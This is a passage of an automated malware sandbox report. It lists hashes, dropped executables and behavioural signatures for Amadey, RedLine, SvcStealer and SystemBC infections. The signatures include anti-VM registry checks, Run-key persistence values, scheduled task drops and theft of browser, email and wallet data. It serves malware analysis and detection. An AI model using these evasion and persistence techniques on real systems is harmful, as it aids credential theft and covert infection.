memory/1264-478-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1264-488-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1968-498-0x0000000000400000-0x0000000000823000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe

MD5 2bb133c52b30e2b6b3608fdc5e7d7a22
SHA1 fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256 b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA512 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

memory/1976-511-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1028-512-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1968-513-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1976-515-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1028-516-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/1968-517-0x0000000000400000-0x0000000000823000-memory.dmp

memory/1028-578-0x0000000000DE0000-0x000000000129C000-memory.dmp

memory/872-579-0x00000000001D0000-0x000000000022F000-memory.dmp

memory/872-584-0x0000000000FD0000-0x00000000016BE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe

MD5 434f706017b7f673ed5586f1470d7d28
SHA1 f431be69eab7bec0c1752f54977e32fd60278617
SHA256 a6b647b49538fe599002c116ee5cd79c7e2d472cb48b24b1dfcf9a2718088c2a
SHA512 d019cb403225f85f5344fb94da6257b216baa5b66000821a0357b03db9da555e51a6cfad576570bfc62f0db8077d92af9793843d48b0e1045ede79e14c4222d7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4814be9121d3c13bfe7b4485d5949fe4
SHA1 50521abbc061dd6f68f847a9b506aa454751d3b3
SHA256 7bb21ccc8d0db57952c6b01582b30db7ec4fad537ac35fb1cd54ae27bedd4118
SHA512 08ffad0466efe9a75143252bfae9776adda356ce1215db531b6be3a6fbdc6e9539f899265b5cfbd6b01a8e38f3cab73b4b0774c87bc49b05cf2fe2baab3ed2dd

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-05 04:09

Reported

2025-03-05 04:11

Platform

win10v2004-20250217-en

Max time kernel

150s

Max time network

151s

Command Line

sihost.exe

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detects SvcStealer Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 4260 created 2604 N/A C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe C:\Windows\system32\sihost.exe

SvcStealer, Diamotrix

stealer downloader svcstealer

Svcstealer family

svcstealer

SystemBC

trojan systembc

Systembc family

systembc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempS64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10016830101\0c8f5528a7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\nsrxg\xjed.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\nsrxg\xjed.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempS64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\nsrxg\xjed.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempS64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10016830101\0c8f5528a7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10016830101\0c8f5528a7.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\ProgramData\nsrxg\xjed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86BF.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\temp_18344.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\temp_18344.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\temp_18364.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempS64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{57488497-4761-4BF1-ABE7-4CFA586E001B}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{FA50BCA7-7100-426F-BC69-928D44773224}\.ba\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098450101\8jQumY5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098460101\BXxKvLN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10005500101\alex122121.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10005500101\alex122121.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10016830101\0c8f5528a7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10098490101\JCFx2xj.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\ProgramData\nsrxg\xjed.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10016830101\0c8f5528a7.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\TempS64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\temp_18344.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\temp_18344.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\temp_18344.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\temp_18344.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\temp_18344.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe N/A
N/A N/A C:\Windows\TEMP\{57488497-4761-4BF1-ABE7-4CFA586E001B}\.cr\z3SJkC5.exe N/A
N/A N/A C:\Windows\TEMP\{FA50BCA7-7100-426F-BC69-928D44773224}\.ba\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aefcdccbdabeec = "\"C:\\ProgramData\\aefcdccbdabeec.exe\"" C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aefcdccbdabeec = "\"C:\\ProgramData\\aefcdccbdabeec.exe\"" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\18fe45c985.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10097710101\\18fe45c985.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10097720121\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0c8f5528a7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10016830101\\0c8f5528a7.exe" C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aefcdccbdabeec = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\10089420101\\4klgwMz.exe\"" C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemHandler = "C:\\Users\\Admin\\AppData\\Local\\Temp\\temp_18364.exe" C:\Users\Admin\AppData\Local\Temp\temp_18364.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemHandler = "C:\\ProgramData\\Winsrv\\winsvc.exe" C:\Users\Admin\AppData\Local\Temp\temp_18364.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
File created C:\Windows\Tasks\futors.job C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098450101\8jQumY5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10005500101\alex122121.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\TempS64C989GJ0FPUV1K4MVV4RBHH8OOEWH3.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10097710101\18fe45c985.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\temp_18364.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\TEMP\{FA50BCA7-7100-426F-BC69-928D44773224}\.ba\WiseTurbo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10005500101\alex122121.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098480101\zY9sqWs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10098490101\JCFx2xj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\TEMP\{57488497-4761-4BF1-ABE7-4CFA586E001B}\.cr\z3SJkC5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10016830101\0c8f5528a7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\nsrxg\xjed.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
